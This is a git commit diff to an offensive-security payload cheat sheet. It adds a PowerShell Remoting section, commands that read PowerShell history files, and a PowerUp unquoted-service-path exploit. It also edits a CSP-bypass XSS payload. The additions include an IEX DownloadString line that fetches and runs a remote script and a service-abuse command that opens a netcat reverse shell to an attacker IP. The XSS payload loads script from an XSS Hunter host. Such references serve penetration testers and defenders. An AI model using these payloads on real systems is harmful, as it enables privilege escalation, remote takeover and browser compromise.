Powershell Remoting
parent
268b4c2d47
commit
c7e3ea005e
|
@ -457,6 +457,7 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
|
||||||
### Powershell history
|
### Powershell history
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
|
||||||
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
|
||||||
cat (Get-PSReadlineOption).HistorySavePath
|
cat (Get-PSReadlineOption).HistorySavePath
|
||||||
|
@ -676,7 +677,24 @@ wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows
|
||||||
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
|
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
|
||||||
```
|
```
|
||||||
|
|
||||||
Metasploit provides the exploit : `exploit/windows/local/trusted_service_path`
|
* Metasploit exploit : `exploit/windows/local/trusted_service_path`
|
||||||
|
* PowerUp exploit
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
# find the vulnerable application
|
||||||
|
C:\> powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('https://your-site.com/PowerUp.ps1'); Invoke-AllChecks"
|
||||||
|
|
||||||
|
...
|
||||||
|
[*] Checking for unquoted service paths...
|
||||||
|
ServiceName : BBSvc
|
||||||
|
Path : C:\Program Files\Microsoft\Bing Bar\7.1\BBSvc.exe
|
||||||
|
StartName : LocalSystem
|
||||||
|
AbuseFunction : Write-ServiceBinary -ServiceName 'BBSvc' -Path <HijackPath>
|
||||||
|
...
|
||||||
|
|
||||||
|
# automatic exploit
|
||||||
|
Invoke-ServiceAbuse -Name [SERVICE_NAME] -Command "..\..\Users\Public\nc.exe 10.10.10.10 4444 -e cmd.exe"
|
||||||
|
```
|
||||||
|
|
||||||
### Example
|
### Example
|
||||||
|
|
||||||
|
|
|
@ -11,6 +11,7 @@
|
||||||
* [Metasploit - Psexec](#metasploit-psexec)
|
* [Metasploit - Psexec](#metasploit-psexec)
|
||||||
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
|
* [Remote Code Execution with PS Credentials](#remote-code-execution-with-ps-credentials)
|
||||||
* [WinRM](#winrm)
|
* [WinRM](#winrm)
|
||||||
|
* [Powershell Remoting](#powershell-remoting)
|
||||||
* [Crackmapexec](#crackmapexec)
|
* [Crackmapexec](#crackmapexec)
|
||||||
* [Winexe](#winexe)
|
* [Winexe](#winexe)
|
||||||
* [WMI](#wmi)
|
* [WMI](#wmi)
|
||||||
|
@ -147,6 +148,30 @@ conn.shell(:powershell) do |shell|
|
||||||
end
|
end
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
|
## Powershell Remoting
|
||||||
|
|
||||||
|
> PSSESSION
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
PS> Enable-PSRemoting
|
||||||
|
|
||||||
|
# one-to-one interactive session
|
||||||
|
PS> Enter-PSSession -computerName DC01
|
||||||
|
[DC01]: PS>
|
||||||
|
|
||||||
|
# one-to-one execute scripts and commands
|
||||||
|
PS> $Session = New-PSSession -ComputerName CLIENT1
|
||||||
|
PS> Invoke-Command -Session $Session -scriptBlock { $test = 1 }
|
||||||
|
PS> Invoke-Command -Session $Session -scriptBlock { $test }
|
||||||
|
1
|
||||||
|
|
||||||
|
# one-to-many execute scripts and commands
|
||||||
|
PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service }
|
||||||
|
PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Winexe
|
## Winexe
|
||||||
|
|
||||||
Integrated to Kali
|
Integrated to Kali
|
||||||
|
@ -262,6 +287,7 @@ PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe"
|
||||||
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe
|
||||||
```
|
```
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
|
- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
|
||||||
|
|
|
@ -4,7 +4,13 @@ A list of useful payloads and bypasses for Web Application Security.
|
||||||
Feel free to improve with your payloads and techniques !
|
Feel free to improve with your payloads and techniques !
|
||||||
I :heart: pull requests :)
|
I :heart: pull requests :)
|
||||||
|
|
||||||
You can also contribute with a :beers: IRL
|
You can also contribute with a :beers: IRL, or using the sponsor button.
|
||||||
|
|
||||||
|
|
||||||
|
<p align="center">
|
||||||
|
<img src="https://repository-images.githubusercontent.com/71220757/fac34f00-9854-11ea-9d6f-55fe78f233fb">
|
||||||
|
</p>
|
||||||
|
|
||||||
|
|
||||||
Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
|
Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
|
||||||
|
|
||||||
|
|
|
@ -972,7 +972,8 @@ window.frames[0].document.head.appendChild(script);
|
||||||
### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
|
### Bypass CSP by [Rhynorater](https://gist.github.com/Rhynorater/311cf3981fda8303d65c27316e69209f)
|
||||||
|
|
||||||
```js
|
```js
|
||||||
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://yoursubdomain.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
|
// CSP Bypass with Inline and Eval
|
||||||
|
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://[YOUR_XSSHUNTER_USERNAME].xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
|
||||||
```
|
```
|
||||||
|
|
||||||
### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)
|
### Bypass CSP by [@akita_zen](https://twitter.com/akita_zen)
|
||||||
|
|
Loading…
Reference in New Issue